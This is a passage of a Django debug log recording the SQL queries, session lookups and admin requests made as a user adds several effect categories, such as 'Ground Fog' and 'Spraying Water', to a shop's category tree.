"shop_category"."parent_id" = 4) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Ground Fog', 4) DEBUG 2019-12-13 13:11:01,266 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 4; args=(4,) DEBUG 2019-12-13 13:11:01,267 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 3 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 3 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 6 AND ("lft" > 3 OR "rght" > 3); args=[3, 2, 3, 2, 6, 3, 3] DEBUG 2019-12-13 13:11:01,271 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Ground Fog', 4, 'categories/2019/12/13/collection4_wmrC3xY.png', 'Ground Fog', false, 'ground-fog', 4, 5, 6, 1) RETURNING "shop_category"."id"; args=('Ground Fog', 4, 'categories/2019/12/13/collection4_wmrC3xY.png', 'Ground Fog', False, 'ground-fog', 4, 5, 6, 1) DEBUG 2019-12-13 13:11:01,273 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:11:01.271821+00:00'::timestamptz, 6, 8, '28', 'Ground Fog', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 11, 1, 271821, tzinfo=), 6, 8, '28', 'Ground Fog', 1, '[{"added": {}}]') [13/Dec/2019 13:11:01] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:11:01,579 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:11:01.565858+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 11, 1, 565858, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:11:01,584 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:11:01,666 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:11:01,741 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:11:01.738046+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 11, 1, 738046, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:11:01] "GET /shop/category/add/ HTTP/1.0" 200 8523 DEBUG 2019-12-13 13:11:02,089 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:11:02.076547+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 11, 2, 76547, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:11:02,094 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:11:02] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:11:20,232 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:11:20.223192+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 11, 20, 223192, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:11:20,235 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:11:20,241 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 4; args=(4,) DEBUG 2019-12-13 13:11:20,245 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 4 LIMIT 1; args=(4,) DEBUG 2019-12-13 13:11:20,246 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 4 AND "shop_category"."slug" = 'foreground-smoke') LIMIT 1; args=(4, 'foreground-smoke') DEBUG 2019-12-13 13:11:20,248 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Foreground Smoke' LIMIT 1; args=('Foreground Smoke',) DEBUG 2019-12-13 13:11:20,251 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Foreground Smoke' AND "shop_category"."parent_id" = 4) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Foreground Smoke', 4) DEBUG 2019-12-13 13:11:20,253 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 4; args=(4,) DEBUG 2019-12-13 13:11:20,254 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 3 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 3 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 6 AND ("lft" > 3 OR "rght" > 3); args=[3, 2, 3, 2, 6, 3, 3] DEBUG 2019-12-13 13:11:20,257 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Foreground Smoke', 4, 'categories/2019/12/13/collection4_klUHkrJ.png', 'Foreground Smoke', false, 'foreground-smoke', 4, 5, 6, 1) RETURNING "shop_category"."id"; args=('Foreground Smoke', 4, 'categories/2019/12/13/collection4_klUHkrJ.png', 'Foreground Smoke', False, 'foreground-smoke', 4, 5, 6, 1) DEBUG 2019-12-13 13:11:20,258 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:11:20.257551+00:00'::timestamptz, 6, 8, '29', 'Foreground Smoke', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 11, 20, 257551, tzinfo=), 6, 8, '29', 'Foreground Smoke', 1, '[{"added": {}}]') [13/Dec/2019 13:11:20] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:11:20,557 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:11:20.547965+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 11, 20, 547965, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:11:20,561 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:11:20,610 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:11:20,654 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:11:20.651892+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 11, 20, 651892, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:11:20] "GET /shop/category/add/ HTTP/1.0" 200 8581 DEBUG 2019-12-13 13:11:21,015 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:11:21.003696+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 11, 21, 3696, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:11:21,019 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:11:21] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:11:46,235 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:11:46.225880+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 11, 46, 225880, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:11:46,238 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:11:46,244 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 5; args=(5,) DEBUG 2019-12-13 13:11:46,248 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 5 LIMIT 1; args=(5,) DEBUG 2019-12-13 13:11:46,250 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 5 AND "shop_category"."slug" = 'water-hits') LIMIT 1; args=(5, 'water-hits') DEBUG 2019-12-13 13:11:46,251 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Water Hits' LIMIT 1; args=('Water Hits',) DEBUG 2019-12-13 13:11:46,253 utils 11259 139831317362432 (0.001) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(5,) DEBUG 2019-12-13 13:11:46,255 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 8 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 8, 1, 1] DEBUG 2019-12-13 13:11:46,258 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Water Hits', 5, 'categories/2019/12/13/collection5.png', 'Water Hits', false, 'water-hits', 2, 3, 8, 1) RETURNING "shop_category"."id"; args=('Water Hits', 5, 'categories/2019/12/13/collection5.png', 'Water Hits', False, 'water-hits', 2, 3, 8, 1) DEBUG 2019-12-13 13:11:46,259 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:11:46.258498+00:00'::timestamptz, 6, 8, '30', 'Water Hits', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 11, 46, 258498, tzinfo=), 6, 8, '30', 'Water Hits', 1, '[{"added": {}}]') [13/Dec/2019 13:11:46] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:11:46,558 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:11:46.549386+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 11, 46, 549386, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:11:46,560 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:11:46,611 utils 11259 139831317362432 (0.002) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:11:46,668 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:11:46.665456+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 11, 46, 665456, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:11:46] "GET /shop/category/add/ HTTP/1.0" 200 8621 DEBUG 2019-12-13 13:11:47,009 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:11:46.994628+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 11, 46, 994628, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:11:47,014 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:11:47] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:12:08,559 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:12:08.550075+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 12, 8, 550075, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:12:08,562 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:12:08,568 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 5; args=(5,) DEBUG 2019-12-13 13:12:08,572 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 5 LIMIT 1; args=(5,) DEBUG 2019-12-13 13:12:08,574 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 5 AND "shop_category"."slug" = 'spraying-water') LIMIT 1; args=(5, 'spraying-water') DEBUG 2019-12-13 13:12:08,575 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Spraying Water' LIMIT 1; args=('Spraying Water',) DEBUG 2019-12-13 13:12:08,578 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Spraying Water' AND "shop_category"."parent_id" = 5) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Spraying Water', 5) DEBUG 2019-12-13 13:12:08,580 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 5; args=(5,) DEBUG 2019-12-13 13:12:08,582 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 8 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 8, 1, 1] DEBUG 2019-12-13 13:12:08,585 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Spraying Water', 5, 'categories/2019/12/13/collection5_VsJvXmq.png', 'Spraying Water', false, 'spraying-water', 2, 3, 8, 1) RETURNING "shop_category"."id"; args=('Spraying Water', 5, 'categories/2019/12/13/collection5_VsJvXmq.png', 'Spraying Water', False, 'spraying-water', 2, 3, 8, 1) DEBUG 2019-12-13 13:12:08,586 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:12:08.585744+00:00'::timestamptz, 6, 8, '31', 'Spraying Water', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 12, 8, 585744, tzinfo=), 6, 8, '31', 'Spraying Water', 1, '[{"added": {}}]') [13/Dec/2019 13:12:08] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:12:08,889 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:12:08.879486+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 12, 8, 879486, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:12:08,893 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:12:08,983 utils 11259 139831317362432 (0.006) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:12:09,087 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:12:09.083953+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 12, 9, 83953, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:12:09] "GET /shop/category/add/ HTTP/1.0" 200 8675 DEBUG 2019-12-13 13:12:09,460 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:12:09.447585+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 12, 9, 447585, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:12:09,465 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:12:09] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:12:21,972 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:12:21.962909+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 12, 21, 962909, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:12:21,975 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; 